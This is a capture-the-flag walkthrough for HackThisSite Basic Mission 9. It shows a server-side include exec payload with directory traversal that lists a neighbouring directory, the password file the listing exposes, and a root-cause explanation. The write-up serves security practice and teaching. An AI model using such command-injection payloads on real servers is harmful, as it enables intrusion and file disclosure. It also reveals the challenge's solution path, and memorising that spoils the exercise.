HackThisSite — Basic Mission 9

---

Key Hint from the Page

"In my attempt to limit SSI to level 8 only, I mistakenly screwed up somewhere — there is a way to get the level 9 password."

Level 9 has no input field for injection. The attack surface is still Basic 8.

---

Exploitation

Step 1 — Go back to Basic 8's name field

Use the SSI exec payload, but traverse into Level 9's directory:

<!--#exec cmd="ls ../../9/"-->

Step 2 — Submit & Click the Link

Output in the .shtml file:

index.php   p91e283zc3.php

Step 3 — Access the Password File

Navigate to:

https://www.hackthissite.org/missions/basic/9/p91e283zc3.php

Returns the plaintext password → submit in Level 9 → Congratz!

---

Root Cause

SSI execution in Basic 8 was never properly sandboxed. Combined with no path restriction on cmd=, directory traversal (../../9/) lets an attacker reach any adjacent directory on the server.

---

Key Takeaway

A vulnerability in one module can compromise another. SSI execution must be fully disabled or strictly sandboxed — partial restrictions with no path validation are ineffective.